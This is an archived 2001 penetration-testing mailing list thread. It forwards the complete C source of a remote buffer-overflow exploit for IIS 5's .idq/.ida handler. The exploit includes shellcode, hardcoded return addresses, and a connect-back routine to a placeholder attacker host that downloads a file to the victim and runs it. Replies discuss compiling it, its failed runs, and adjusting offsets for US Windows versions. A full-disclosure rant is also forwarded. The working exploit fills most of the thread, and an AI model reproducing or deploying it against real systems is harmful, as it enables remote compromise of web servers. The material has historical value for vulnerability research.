Penetration Testing mailing list archives

RE: [Fwd: Re: FWD: Re: .ida vulnerability..]

From: "Marc Maiffret" <marc () eeye com>
Date: Sat, 7 Jul 2001 00:36:31 -0700
the offsets of the exploit are set for the Japanese version of nt. you'll
have to tweak them by hand to the u.s. locations (which there can be a few
depending on dll versions etc...)

it works though... just got to massage it a bit.

Signed,
Marc Maiffret
Chief Hacking Officer
eEye Digital Security
T.949.349.9062
F.949.349.9538
http://eEye.com/Retina - Network Security Scanner
http://eEye.com/Iris - Network Traffic Analyzer
http://eEye.com/SecureIIS - Web Application Firewall

| -----Original Message-----
| From: bluefur0r bluefur0r [mailto:bluefur0r () drea ms]
| Sent: Thursday, July 05, 2001 10:45 AM
| To: ph08us () evilemail com
| Cc: pen-test () securityfocus com; cdowns () skillsoft com
| Subject: Re: [Fwd: Re: FWD: Re: .ida vulnerability..]
|
|
| I tried this on my IIS5 machine and it did a wonderful job of
| spiking inetinfo.exe to 99% cpu util. I tried sending ncx99.exe
| and well no port shell on 99 was granted. =( boohoo!
| blue
| Op Wed,  4 Jul 2001 04:55:09 -0400 PhoBus <ph08us () evilemail com>
| geschreven:
| >>From my analysis of the code, the program fork()s itself and
| one process sends the shellcode to the target while another
| listens on port 80 for connections.  When the target connects
| back, it sends the <file> to the remote system which is then executed.
| >
| >I have not been able to get the code to work (i.e. the server
| does not connect back).  Anyone has had success testing it so far?
| >
| >
| >-------- Original Message --------
| >Subject: Re: FWD: Re: .ida vulnerability..
| >From: cdowns <cdowns () skillsoft com>
| >To: pen-test () securityfocus com
| >
| >well got it compiled with no problem but what the hell does <file> do ?
| >tried to overwrite a file in a writeable directory and then tried to
| >create a file in a writable directory ? hmmmmm something im not seeing
| >here ? thanks
| >
| >-D
| >
| >Marc Maiffret wrote:
| >
| >> This came across Steve's win2ksec mailing list almost a week or so ago.
| >> Not sure why none of the securityfocus mailing lists have picked it up
| >> (at least to my knowledge). Working remote IIS exploit for the .ida
| >> hole. Figured since you guys have had a discussion about writing a
| >> exploit for it etc... this might be helpful to you.
| >>
| >> Signed,
| >> Marc Maiffret
| >> Chief Hacking Officer
| >> eEye Digital Security
| >> T.949.349.9062
| >> F.949.349.9538
| >> http://eEye.com/Retina - Network Security Scanner
| >> http://eEye.com/Iris - Network Traffic Analyzer
| >> http://eEye.com/SecureIIS - Stop known and unknown IIS vulnerabilities
| >>
| >> ||> ----- Original Message -----
| >> ||> From: "Steve" <steve () SECURESOLUTIONS ORG>
| >> ||> To: <win2ksecadvice () LISTSERV NTSECURITY NET>
| >> ||> Sent: Wednesday, June 27, 2001 2:57 PM
| >> ||> Subject: Fwd: Full Disclosure .ida exploit.
| >> ||>
| >> ||>
| >> ||> > This was sent to me a few minutes ago.  Here is the code as
| >> posted to ||> Packet Storm and a rant by the person who brought it to
| >> my attention. ||While
| >> ||> I normally have tried to keep rants off of the mailing list, I
| >> ||have always
| >> ||> been very pro full disclosure and will do my best to defend it.
| >> Please ||> note, I have not verified this code to be functioning but
| >> will make an ||> attempt to later this evening.  If anyone else has
| >> time (Ken?  Mark?) ||please
| >> ||> do so and post to the list.
| >> ||> >
| >> ||> > -Steve
| >> ||> >
| >> ||> > /*
| >> ||> >  IIS5.0 .idq overrun remote exploit
| >> ||> >  Programmed by hsj  : 01.06.21
| >> ||> >
| >> ||> >  code flow:
| >> ||> >   overrun -> jmp or call ebx -> jmp 8 ->
| >> ||> >   check shellcode addr and jump to there ->
| >> ||> >   shellcode -> make back channel -> download & exec code
| >> ||> > */
| >> ||> > #include <stdio.h>
| >> ||> > #include <stdlib.h>
| >> ||> > #include <string.h>
| >> ||> > #include <signal.h>
| >> ||> > #include <sys/types.h>
| >> ||> > #include <sys/socket.h>
| >> ||> > #include <sys/ioctl.h>
| >> ||> > #include <sys/time.h>
| >> ||> > #include <sys/wait.h>
| >> ||> > #include <errno.h>
| >> ||> > #include <unistd.h>
| >> ||> > #include <fcntl.h>
| >> ||> > #include <netinet/in.h>
| >> ||> > #include <limits.h>
| >> ||> > #include <netdb.h>
| >> ||> > #include <arpa/inet.h>
| >> ||> >
| >> ||> > #define RET                 0x77e516de  /* jmp or call ebx */ ||>
| >> > #define GMHANDLEA           0x77e56c42  /* Address of
| >> GetModuleHandleA ||*/
| >> ||> > #define GPADDRESS           0x77e59ac1  /* Address of
| >> |GetProcAddress */
| >> ||> > #define GMHANDLEA_OFFSET    24
| >> ||> > #define GPADDRESS_OFFSET    61
| >> ||> > #define OFFSET              234         /* exception handler
| >> offset */ ||> > #define NOP                 0x41
| >> ||> >
| >> ||> > #define MASKING             1
| >> ||> > #if MASKING
| >> ||> > #define PORTMASK            0x4141
| >> ||> > #define ADDRMASK            0x41414141
| >> ||> > #define PORTMASK_OFFSET     128
| >> ||> > #define ADDRMASK_OFFSET     133
| >> ||> > #endif
| >> ||> >
| >> ||> > #define PORT                80
| >> ||> > #define ADDR                "attacker.mydomain.co.jp"
| >> ||> > #define PORT_OFFSET         115
| >> ||> > #define ADDR_OFFSET         120
| >> ||> > unsigned char shellcode[]=
| >> ||> >
| >> "\x5B\x33\xC0\x40\x40\xC1\xE0\x09\x2B\xE0\x33\xC9\x41\x41\x33\xC0" ||>
| >> > "\x51\x53\x83\xC3\x06\x88\x03\xB8\xDD\xCC\xBB\xAA\xFF\xD0\x59\x50"
| >> ||> >
| >> "\x43\xE2\xEB\x33\xED\x8B\xF3\x5F\x33\xC0\x80\x3B\x2E\x75\x1E\x88" ||>
| >> > "\x03\x83\xFD\x04\x75\x04\x8B\x7C\x24\x10\x56\x57\xB8\xDD\xCC\xBB"
| >> ||> >
| >> "\xAA\xFF\xD0\x50\x8D\x73\x01\x45\x83\xFD\x08\x74\x03\x43\xEB\xD8" ||>
| >> > "\x8D\x74\x24\x20\x33\xC0\x50\x40\x50\x40\x50\x8B\x46\xFC\xFF\xD0"
| >> ||> >
| >> "\x8B\xF8\x33\xC0\x40\x40\x66\x89\x06\xC1\xE0\x03\x50\x56\x57\x66" ||>
| >> > "\xC7\x46\x02\xBB\xAA\xC7\x46\x04\x44\x33\x22\x11"
| >> ||> > #if MASKING
| >> ||> > "\x66\x81\x76\x02\x41\x41\x81\x76\x04\x41\x41\x41\x41"
| >> ||> > #endif
| >> ||> > "\x8B\x46\xF8\xFF\xD0\x33\xC0"
| >> ||> >
| >> "\xC7\x06\x5C\x61\x61\x2E\xC7\x46\x04\x65\x78\x65\x41\x88\x46\x07" ||>
| >> > "\x66\xB8\x80\x01\x50\x66\xB8\x01\x81\x50\x56\x8B\x46\xEC\xFF\xD0"
| >> ||> >
| >> "\x8B\xD8\x33\xC0\x50\x40\xC1\xE0\x09\x50\x8D\x4E\x08\x51\x57\x8B" ||>
| >> > "\x46\xF4\xFF\xD0\x85\xC0\x7E\x0E\x50\x8D\x4E\x08\x51\x53\x8B\x46"
| >> ||> >
| >> "\xE8\xFF\xD0\x90\xEB\xDC\x53\x8B\x46\xE4\xFF\xD0\x57\x8B\x46\xF0" ||>
| >> > "\xFF\xD0\x33\xC0\x50\x56\x56\x8B\x46\xE0\xFF\xD0\x33\xC0\xFF\xD0";
| >> ||> >
| >> ||> > unsigned char storage[]=
| >> ||> > "\xEB\x02"
| >> ||> > "\xEB\x4E"
| >> ||> > "\xE8\xF9\xFF\xFF\xFF"
| >> ||> > "msvcrt.ws2_32.socket.connect.recv.closesocket."
| >> ||> > "_open._write._close._execl.";
| >> ||> >
| >> ||> > unsigned char forwardjump[]=
| >> ||> > "%u08eb";
| >> ||> >
| >> ||> > unsigned char jump_to_shell[]=
| >> ||> > "%uC033%uB866%u031F%u0340%u8BD8%u8B03"
| >> ||> > "%u6840%uDB33%u30B3%uC303%uE0FF";
| >> ||> >
| >> ||> > unsigned int resolve(char *name)
| >> ||> > {
| >> ||> >     struct hostent *he;
| >> ||> >     unsigned int ip;
| >> ||> >
| >> ||> >     if((ip=inet_addr(name))==(-1))
| >> ||> >     {
| >> ||> >         if((he=gethostbyname(name))==0)
| >> ||> >             return 0;
| >> ||> >         memcpy(&ip,he->h_addr,4);
| >> ||> >     }
| >> ||> >     return ip;
| >> ||> > }
| >> ||> >
| >> ||> > int make_connection(char *address,int port)
| >> ||> > {
| >> ||> >     struct sockaddr_in server,target;
| >> ||> >     int s,i,bf;
| >> ||> >     fd_set wd;
| >> ||> >     struct timeval tv;
| >> ||> >
| >> ||> >     s = socket(AF_INET,SOCK_STREAM,0);
| >> ||> >     if(s<0)
| >> ||> >         return -1;
| >> ||> >     memset((char *)&server,0,sizeof(server));
| >> ||> >     server.sin_family = AF_INET;
| >> ||> >     server.sin_addr.s_addr = htonl(INADDR_ANY);
| >> ||> >     server.sin_port = 0;
| >> ||> >
| >> ||> >     target.sin_family = AF_INET;
| >> ||> >     target.sin_addr.s_addr = resolve(address);
| >> ||> >     if(target.sin_addr.s_addr==0)
| >> ||> >     {
| >> ||> >         close(s);
| >> ||> >         return -2;
| >> ||> >     }
| >> ||> >     target.sin_port = htons(port);
| >> ||> >     bf = 1;
| >> ||> >     ioctl(s,FIONBIO,&bf);
| >> ||> >     tv.tv_sec = 10;
| >> ||> >     tv.tv_usec = 0;
| >> ||> >     FD_ZERO(&wd);
| >> ||> >     FD_SET(s,&wd);
| >> ||> >     connect(s,(struct sockaddr *)&target,sizeof(target));
| >> ||> >     if((i=select(s+1,0,&wd,0,&tv))==(-1))
| >> ||> >     {
| >> ||> >         close(s);
| >> ||> >         return -3;
| >> ||> >     }
| >> ||> >     if(i==0)
| >> ||> >     {
| >> ||> >         close(s);
| >> ||> >         return -4;
| >> ||> >     }
| >> ||> >     i = sizeof(int);
| >> ||> >     getsockopt(s,SOL_SOCKET,SO_ERROR,&bf,&i);
| >> ||> >     if((bf!=0)||(i!=sizeof(int)))
| >> ||> >     {
| >> ||> >         close(s);
| >> ||> >         errno = bf;
| >> ||> >         return -5;
| >> ||> >     }
| >> ||> >     ioctl(s,FIONBIO,&bf);
| >> ||> >     return s;
| >> ||> > }
| >> ||> >
| >> ||> > int get_connection(int port)
| >> ||> > {
| >> ||> >     struct sockaddr_in local,remote;
| >> ||> >     int lsock,csock,len,reuse_addr;
| >> ||> >
| >> ||> >     lsock = socket(AF_INET,SOCK_STREAM,0);
| >> ||> >     if(lsock<0)
| >> ||> >     {
| >> ||> >         perror("socket");
| >> ||> >         exit(1);
| >> ||> >     }
| >> ||> >     reuse_addr = 1;
| >> ||> >     if(setsockopt(lsock,SOL_SOCKET,SO_REUSEADDR,(char
| >> ||> *)&reuse_addr,sizeof(reuse_addr))<0)
| >> ||> >     {
| >> ||> >         perror("setsockopt");
| >> ||> >         close(lsock);
| >> ||> >         exit(1);
| >> ||> >     }
| >> ||> >     memset((char *)&local,0,sizeof(local));
| >> ||> >     local.sin_family = AF_INET;
| >> ||> >     local.sin_port = htons(port);
| >> ||> >     local.sin_addr.s_addr = htonl(INADDR_ANY);
| >> ||> >     if(bind(lsock,(struct sockaddr *)&local,sizeof(local))<0) ||>
| >> >     {
| >> ||> >         perror("bind");
| >> ||> >         close(lsock);
| >> ||> >         exit(1);
| >> ||> >     }
| >> ||> >     if(listen(lsock,1)<0)
| >> ||> >     {
| >> ||> >         perror("listen");
| >> ||> >         close(lsock);
| >> ||> >         exit(1);
| >> ||> >     }
| >> ||> > retry:
| >> ||> >     len = sizeof(remote);
| >> ||> >     csock = accept(lsock,(struct sockaddr *)&remote,&len); ||> >
| >>    if(csock<0)
| >> ||> >     {
| >> ||> >         if(errno!=EINTR)
| >> ||> >         {
| >> ||> >             perror("accept");
| >> ||> >             close(lsock);
| >> ||> >             exit(1);
| >> ||> >         }
| >> ||> >         else
| >> ||> >             goto retry;
| >> ||> >     }
| >> ||> >     close(lsock);
| >> ||> >     return csock;
| >> ||> > }
| >> ||> >
| >> ||> > int main(int argc,char *argv[])
| >> ||> > {
| >> ||> >     int i,j,s,pid;
| >> ||> >     unsigned int cb;
| >> ||> >     unsigned short port;
| >> ||> >     char *p,buf[512],buf2[512],buf3[2048];
| >> ||> >     FILE *fp;
| >> ||> >
| >> ||> >     if(argc!=3)
| >> ||> >     {
| >> ||> >         printf("usage: $ %s ip file\n",argv[0]);
| >> ||> >         return -1;
| >> ||> >     }
| >> ||> >     if((fp=fopen(argv[2],"rb"))==0)
| >> ||> >         return -2;
| >> ||> >
| >> ||> >     if(!(cb=resolve(ADDR)))
| >> ||> >         return -3;
| >> ||> >
| >> ||> >     if((pid=fork())<0)
| >> ||> >         return -4;
| >> ||> >
| >> ||> >     if(pid)
| >> ||> >     {
| >> ||> >         fclose(fp);
| >> ||> >         s = make_connection(argv[1],80);
| >> ||> >         if(s<0)
| >> ||> >         {
| >> ||> >             printf("connect error:[%d].\n",s);
| >> ||> >             kill(pid,SIGTERM);
| >> ||> >             return -5;
| >> ||> >         }
| >> ||> >
| >> ||> >         j = strlen(shellcode);
| >> ||> >         *(unsigned int *)&shellcode[GMHANDLEA_OFFSET] =
| >> GMHANDLEA; ||> >         *(unsigned int *)&shellcode[GPADDRESS_OFFSET]
| >> = GPADDRESS; ||> >         port = htons(PORT);
| >> ||> > #if MASKING
| >> ||> >         port ^= PORTMASK;
| >> ||> >         cb ^= ADDRMASK;
| >> ||> >         *(unsigned short *)&shellcode[PORTMASK_OFFSET] =
| >> PORTMASK; ||> >         *(unsigned int *)&shellcode[ADDRMASK_OFFSET] =
| >> ADDRMASK; ||> > #endif
| >> ||> >         *(unsigned short *)&shellcode[PORT_OFFSET] = port; ||> >
| >>        *(unsigned int *)&shellcode[ADDR_OFFSET] = cb;
| >> ||> >         for(i=0;i<strlen(shellcode);i++)
| >> ||> >         {
| >> ||> >             if((shellcode[i]==0x0a)||
| >> ||> >                (shellcode[i]==0x0d)||
| >> ||> >                (shellcode[i]==0x3a))
| >> ||> >                 break;
| >> ||> >         }
| >> ||> >         if(i!=j)
| >> ||> >         {
| >> ||> >             printf("bad portno or ip address...\n");
| >> ||> >             close(s);
| >> ||> >             kill(pid,SIGTERM);
| >> ||> >             return -6;
| >> ||> >         }
| >> ||> >
| >> ||> >         memset(buf,1,sizeof(buf));
| >> ||> >         p = &buf[OFFSET-2];
| >> ||> >         sprintf(p,"%s",forwardjump);
| >> ||> >         p += strlen(forwardjump);
| >> ||> >         *p++ = 1;
| >> ||> >         *p++ = '%';
| >> ||> >         *p++ = 'u';
| >> ||> >         sprintf(p,"%04x",(RET>>0)&0xffff);
| >> ||> >         p += 4;
| >> ||> >         *p++ = '%';
| >> ||> >         *p++ = 'u';
| >> ||> >         sprintf(p,"%04x",(RET>>16)&0xffff);
| >> ||> >         p += 4;
| >> ||> >         *p++ = 1;
| >> ||> >         sprintf(p,"%s",jump_to_shell);
| >> ||> >
| >> ||> >         memset(buf2,NOP,sizeof(buf2));
| >> ||> >
| >> ||>
| >> ||memcpy(&buf2[sizeof(buf2)-strlen(shellcode)-strlen(storage)-1],stor
| >> ||age,strle
| >> ||> n(storage));
| >> ||> >
| >> ||>
| >> ||memcpy(&buf2[sizeof(buf2)-strlen(shellcode)-1],shellcode,strlen(she
| >> ||llcode));
| >> ||> >         buf2[sizeof(buf2)-1] = 0;
| >> ||> >
| >> ||> >         sprintf(buf3,"GET /a.idq?%s=a HTTP/1.0\r\nShell:
| >> ||> %s\r\n\r\n",buf,buf2);
| >> ||> >         write(s,buf3,strlen(buf3));
| >> ||> >
| >> ||> >         printf("---");
| >> ||> >         for(i=0;i<strlen(buf3);i++)
| >> ||> >         {
| >> ||> >             if((i%16)==0)
| >> ||> >                 printf("\n");
| >> ||> >             printf("%02X ",buf3[i]&0xff);
| >> ||> >         }
| >> ||> >         printf("\n---\n");
| >> ||> >
| >> ||> >         wait(0);
| >> ||> >         sleep(1);
| >> ||> >         shutdown(s,2);
| >> ||> >         close(s);
| >> ||> >
| >> ||> >         printf("Done.\n");
| >> ||> >     }
| >> ||> >     else
| >> ||> >     {
| >> ||> >         s = get_connection(PORT);
| >> ||> >         j = 0;
| >> ||> >         while((i=fread(buf,1,sizeof(buf),fp)))
| >> ||> >         {
| >> ||> >             write(s,buf,i);
| >> ||> >             j += i;
| >> ||> >             printf(".");
| >> ||> >             fflush(stdout);
| >> ||> >         }
| >> ||> >         fclose(fp);
| >> ||> >         printf("\n%d bytes send...\n",j);
| >> ||> >
| >> ||> >         shutdown(s,2);
| >> ||> >         close(s);
| >> ||> >     }
| >> ||> >
| >> ||> >     return 0;
| >> ||> > }
| >> ||> >
| >> ||> >
| >> ||> >
| >> ||> >
| >> ||> > >From: fuq69rc () hushmail com
| >> ||> > >Date: Wed, 27 Jun 2001 13:17:57 -0800 (PDT)
| >> ||> > >To: steve () SECURESOLUTIONS ORG
| >> ||> > >Subject: Full Disclosure .ida exploit.
| >> ||> > >
| >> ||> > >Steve I hope you let this through you your win2k mailing list. I
| >> know ||its
| >> ||> > >a bit of a rant but I think it needs to be said and also the
| >> |fact that
| >> ||> there
| >> ||> > >is a link to the .ida exploit should be worth while enough.
| >> Thanks. ||> > >-----
| >> ||> > >Isn't it strange that a gift can be an enemy? That a
| >> ||privilege can be a
| >> ||> > >chore. Maybe its just me but security is going nowhere fast
| >> because ||> everyone
| >> ||> > >is to busy looking at the ten thousand foot view instead of
| >> getting ||down,
| >> ||> > > getting their hands dirty, and fixing the problem at its core.
| >> ||> > >
| >> ||> > >I see everyone trying to run around and figure out what to do
| >> ||about the
| >> ||> > >hax0rs and the script kiddies. Bureaucrats and has never
| >> |been security
| >> ||> experts
| >> ||> > >are all looking to form organizations that they hope will cut
| >> down on ||the
| >> ||> > >"threat" of vulnerability exposure, when thats not the real
| >> problem. ||> Software
| >> ||> > >companies writing insecure software IS the problem.
| >> ||> > >
| >> ||> > >Who gets shit on in the end? The hackers and researchers
| >> |putting their
| >> ||> own
| >> ||> > >time into finding vulnerabilities in software thats been
| >> developed by ||> multi-
| >> ||> > >billion dollar software companies. These same hackers and
| >> researchers ||who
| >> ||> > >have done all of this work for FREE, to help the security
| >> community. ||They
| >> ||> > >end up being the ones that get shit on for releasing this
| >> information ||to
| >> ||> > >the masses so that they might help educate people about security
| >> ||> vulnerabilities
| >> ||> > >and keep software companies on their toes and honest about ||the
| >> security
| >> ||> > >issues that affect their software.
| >> ||> > >
| >> ||> > >Most software companies do not take security seriously,
| >> regardless of ||> what
| >> ||> > >they say, because the bean counters at most software companies
| >> never ||see
| >> ||> > >an ROI (Return on Investment) for adding much needed security
| >> ||mechanisms
| >> ||> > >to their security software. Why not? because honestly not
| >> ||enough people
| >> ||> > >are standing up and demanding for a change. Instead the majority
| >> of ||> administrators,
| >> ||> > > NT at least, tend to just laugh and say, for example, "Ahh haha
| >> ||another
| >> ||> > >MS hole, what's new" and then proceed to shrug it off, stay
| >> |bent over,
| >> ||> and
| >> ||> > >keep taking it from software companies.
| >> ||> > >
| >> ||> > >Also for those administrators that actually do care about
| >> security ||you'll
| >> ||> > >tend to find that a lot of them are actually paranoid about
| >> |installing
| >> ||> security
| >> ||> > >patches from companies like Microsoft because they've had a
| >> |really bad
| >> ||> track
| >> ||> > >record on creating patches that end up breaking and then need
| >> patches ||> themselves.
| >> ||> > >So the administrators end up waiting for the next service pack
| >> (which ||> leaves
| >> ||> > >them vulnerable), UNLESS they have a full disclosure example
| >> exploit ||that
| >> ||> > >first hand shows them how serious the vulnerability is, at
| >> |which point
| >> ||I
| >> ||> > >promise you they WILL install the patch.
| >> ||> > >
| >> ||> > >I could go on forever about the circles the security industry is
| >> ||running
| >> ||> > >in or how 80% of the "security experts" have never done ANYTHING
| >> to ||help
| >> ||> > >security (hi russ!!) besides spout off their mouth about topics
| >> they ||> usually
| >> ||> > >have never really experienced first hand.
| >> ||> > >
| >> ||> > >A handful of people, like Russ Cooper, have said that when
| >> people ||release
| >> ||> > >non-malicious example exploits that it makes it easier for
| >> people to ||take
| >> ||> > >those exploits and tweak them into doing bad things. That is
| >> ||completely
| >> ||> > >inaccurate and its a statement being made by someone who
| >> |wouldn't know
| >> ||> what
| >> ||> > >an exploit was if shellcode slapped him in the face.
| >> ||> > >
| >> ||> > >I came across this the other day on packetstorm. Working .ida
| >> exploit ||> which
| >> ||> > >is probably one of the first publicly released, although as
| >> ||always when
| >> ||> > >any big hole is released and you don't see exploits on
| >> |Bugtraq or what
| >> ||> not
| >> ||> > >that MEANS thats because people aren't sharing their exploits
| >> with ||> everyone
| >> ||> > >but they are out there and most likely being used.
| >> ||> > >
| >> ||> >
| >> ||>
| >> ||>http://209.143.242.119/cgi-bin/cbmc/forums.cgi?authkey=anonymous&u
| >> ||name=anon
| >> ||> ymous&datopic=General&mesgcheck=defined&gum=3087&editoron=
| >> ||> > >
| >> ||> > >There is a whole other world out there that few people can even
| >> begin ||to
| >> ||> > >understand. Exploits are created daily for all types of
| >> ||vulnerabilities
| >> ||> > >that people might have a use for. Just because you dont see it
| >> on the ||> handful
| >> ||> > >of security mailing lists, or because CERT, NIPC, or Russ Cooper
| >> have ||not
| >> ||> > >heard about it does not mean it is not there.
| >> ||> > >
| >> ||> > >All those opposed to full disclosure, be damned. For to resist
| >> is to ||piss
| >> ||> > >against the wind and all who do will end up smelling.
| >> ||> > >Free, encrypted, secure Web-based email at www.hushmail.com ||>
| >> >
| >> ||> >
| >> _____________________________________________________________________
| >> ||> > ** TO UNSUBSCRIBE, send the command "UNSUBSCRIBE win2ksecadvice"
| >> ||> > ** FOR A WEEKLY DIGEST, send the command "SET win2ksecadvice
| >> DIGEST" ||> > SEND ALL COMMANDS TO: listserv () listserv ntsecurity net
| >> ||> >
| >> ||>
| >> ||>
| >> ||
| >> ||
| >
| >--
| >------------------------------
| >    Christopher M Downs
| >Network Security Administrator
| >   Skillsoft Corporation
| >    cdowns () skillsoft com
| >"Micro$oft typed backwards
| >      spells "c:\duh /?"
| >------------------------------
| >
| >
| >
| >
| >-----------------------------------------------------------------
| -----------
| >----------
| >
| >This list is provided by the SecurityFocus Security Intelligence Alert
| >(SIA) Service For more information on SecurityFocus' SIA service which
| >automatically alerts you to  the latest security vulnerabilities please
| >see:
| >
| >https://alerts.securityfocus.com/
| >
| >
| >--
| >Gerry Chng      | Subtlety is the art of saying
| >mail () gerryc com | what you think and getting out
| >                | of the way before it is understood
| >
| >
| >
| >
| >
| >_________________________________________________________
| >Get your own FREE evilemail.com Email account at...
| >http://www.evilemail.com
| >
| >EvilEmail.com - Free email for the living and the dead.
| >_________________________________________________________
| >
| >
| >
| >-----------------------------------------------------------------
| ---------------------
| >
| >This list is provided by the SecurityFocus Security Intelligence
| Alert (SIA) Service
| >For more information on SecurityFocus' SIA service which
| automatically alerts you to
| >the latest security vulnerabilities please see:
| >
| >https://alerts.securityfocus.com/
| >
| >
|
| =================================================================
| Kies een origineel e-mailadres op www.emails.nl
|
| ------------------------------------------------------------------
| --------------------
|
| This list is provided by the SecurityFocus Security Intelligence
| Alert (SIA) Service
| For more information on SecurityFocus' SIA service which
| automatically alerts you to
| the latest security vulnerabilities please see:
|
| https://alerts.securityfocus.com/
|
|


--------------------------------------------------------------------------------------

This list is provided by the SecurityFocus Security Intelligence Alert (SIA) Service
For more information on SecurityFocus' SIA service which automatically alerts you to 
the latest security vulnerabilities please see:

https://alerts.securityfocus.com/
Current thread:

Re: [Fwd: Re: FWD: Re: .ida vulnerability..] PhoBus (Jul 05)
- <Possible follow-ups>
- Re: [Fwd: Re: FWD: Re: .ida vulnerability..] bluefur0r bluefur0r (Jul 05)
  - RE: [Fwd: Re: FWD: Re: .ida vulnerability..] Marc Maiffret (Jul 07)